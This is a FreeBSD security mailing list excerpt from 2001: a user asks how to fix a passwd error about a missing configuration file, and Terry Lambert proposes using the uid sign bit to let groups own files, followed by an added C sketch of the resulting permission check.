	(envelope-from spades@galaxynet.org)
Received: from bryan (ad202.166.106.236.magix.com.sg [202.166.106.236])
	by smtp23.singnet.com.sg (8.11.2/8.11.2) with SMTP id f2I6WAe11423
	for <freebsd-security@freebsd.org>; Sun, 18 Mar 2001 14:32:10 +0800
Message-Id: <3.0.32.20010318144200.006c4098@smtp.magix.com.sg>
X-Sender: spades@smtp.magix.com.sg
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sun, 18 Mar 2001 14:42:00 +0800
To: freebsd-security@freebsd.org
From: Spades <spades@galaxynet.org>
Subject: passwd problem
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

# passwd
    Warning: configuration file         missing; please run 'tconf'
    Unable to update EPS password.
    Password changed.

How do I reinstall passwd or fix this?




From owner-freebsd-security  Sat Mar 17 23:38:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp10.phx.gblx.net (smtp10.phx.gblx.net [206.165.6.140])
	by hub.freebsd.org (Postfix) with ESMTP
	id BE3BB37B725; Sat, 17 Mar 2001 23:38:51 -0800 (PST)
	(envelope-from tlambert@usr05.primenet.com)
Received: (from daemon@localhost)
	by smtp10.phx.gblx.net (8.9.3/8.9.3) id AAA96598;
	Sun, 18 Mar 2001 00:38:34 -0700
Received: from usr05.primenet.com(206.165.6.205)
 via SMTP by smtp10.phx.gblx.net, id smtpdiFiFMa; Sun Mar 18 00:38:26 2001
Received: (from tlambert@localhost)
	by usr05.primenet.com (8.8.5/8.8.5) id AAA03250;
	Sun, 18 Mar 2001 00:38:33 -0700 (MST)
From: Terry Lambert <tlambert@primenet.com>
Message-Id: <200103180738.AAA03250@usr05.primenet.com>
Subject: Re: about common group & user ID space (PR kern/14584)
To: babkin@bellatlantic.net (Sergey Babkin)
Date: Sun, 18 Mar 2001 07:38:31 +0000 (GMT)
Cc: security@FreeBSD.ORG, wes@softweyr.com (Wes Peters),
	rwatson@FreeBSD.ORG (Robert Watson), fs@FreeBSD.ORG
In-Reply-To: <3AB3FC38.94711FFF@bellatlantic.net> from "Sergey Babkin" at Mar 17, 2001 07:07:20 PM
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> I want to commit PR kern/14584. I've been told that it's good
> to discuss it in -arch, -security and -fs. (It has been sort of
> discussed on -hackers already, there were not much replies).
> So I've posted a message on -arch, and now on -security and -fs.
> I've also discussed this idea shortly with Kirk McKusick at 
> Usenix-2000 at the BSD BOF and he generally liked it and suggested
> to review further.

You could do this a bit more cleanly by just stealing the sign
bit, and setting it if the uid field contains a group ID.

There would be no conversion problem for an existing system.

The sign bit would not be "stolen", unless the sysctl was in
the "active" state.

This changes the check to a one line change, conditional on
the high bit being set.

In trade, the "set group owner" code gets a bit more complicated,
but that's in the user space "chown" code, where you have to tell
it to set a group, explicitly (so that it will look up the group,
not the user, for a non-numeric ID, and set the high bit when
stuffing it in the chown id field).

Note that this change is really necessary in the user space code
anyway: even if you make the UID and GID numeric values not
intersect, there is still the possibility of a group and user
having the same name, so a set-by-name needs a separate flag
(think "chown bin.bin foo", for example).

The benefits of not having to grovel through the FS contents or
do more complex ID space transformations, of moving the majority
of changes to user space, and of not needing to revert ownership
if you turn it off, are all pluses.


					Terry Lambert
					terry@lambert.org
---
Any opinions in this posting are my own and not those of my present
or previous employers.

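An added sketch (not code from PR kern/14584 or from Terry) of the "one line change, conditional on the high bit" he describes, applied to the classic owner/group/other check and exercised against Sergey's "writers"/"readers" case. OWNER_IS_GROUP, vaccess_unified, the struct creds layout and the sample gids 1001/1002/1003 are all hypothetical, chosen for the illustration.

```c
#include <sys/types.h>
#include <stdint.h>
#include <unistd.h>   /* R_OK, W_OK, X_OK */

/* Hypothetical flag: with the sysctl on, an inode uid field with this bit set
 * names a group (in the low 31 bits) rather than a user. */
#define OWNER_IS_GROUP 0x80000000u

struct creds {
    uid_t uid;
    const gid_t *groups;  /* effective gid followed by supplementary groups */
    int ngroups;
};

static int in_groups(const struct creds *c, gid_t g)
{
    for (int i = 0; i < c->ngroups; i++)
        if (c->groups[i] == g)
            return 1;
    return 0;
}

/* Classic owner/group/other check with the single conditional Terry describes:
 * when unified mode is on and the high bit is set, "owner" is decided by group
 * membership instead of by uid.  want is a mask of R_OK/W_OK/X_OK; returns 1
 * if every requested bit is granted. */
int vaccess_unified(int unified, uint32_t owner_field, gid_t gid, mode_t mode,
                    const struct creds *c, int want)
{
    int is_owner, granted;

    if (unified && (owner_field & OWNER_IS_GROUP))
        is_owner = in_groups(c, (gid_t)(owner_field & ~OWNER_IS_GROUP));
    else
        is_owner = (c->uid == (uid_t)owner_field);   /* today's rule */

    if (is_owner)
        granted = (mode >> 6) & 7;   /* owner class never falls through */
    else if (in_groups(c, gid))
        granted = (mode >> 3) & 7;
    else
        granted = mode & 7;
    return (granted & want) == want;
}

/* Constructed sample: Sergey's "writers" (gid 1001) and "readers" (gid 1002)
 * on one file, mode 0640, with "writers" stored in the uid field. */
static const gid_t writer_groups[] = {1001};
static const gid_t reader_groups[] = {1002};
static const gid_t other_groups[]  = {1003};
const struct creds sample_writer = {1000, writer_groups, 1};
const struct creds sample_reader = {2000, reader_groups, 1};
const struct creds sample_other  = {3000, other_groups, 1};

int demo_access(const struct creds *c, int want, int unified)
{
    return vaccess_unified(unified, OWNER_IS_GROUP | 1001u, 1002, 0640, c, want);
}
```

With the sysctl off the same field is read as a plain uid, so a member of "writers" falls into the "other" class and gets nothing, which is the backwards-compatible behaviour both mails ask for.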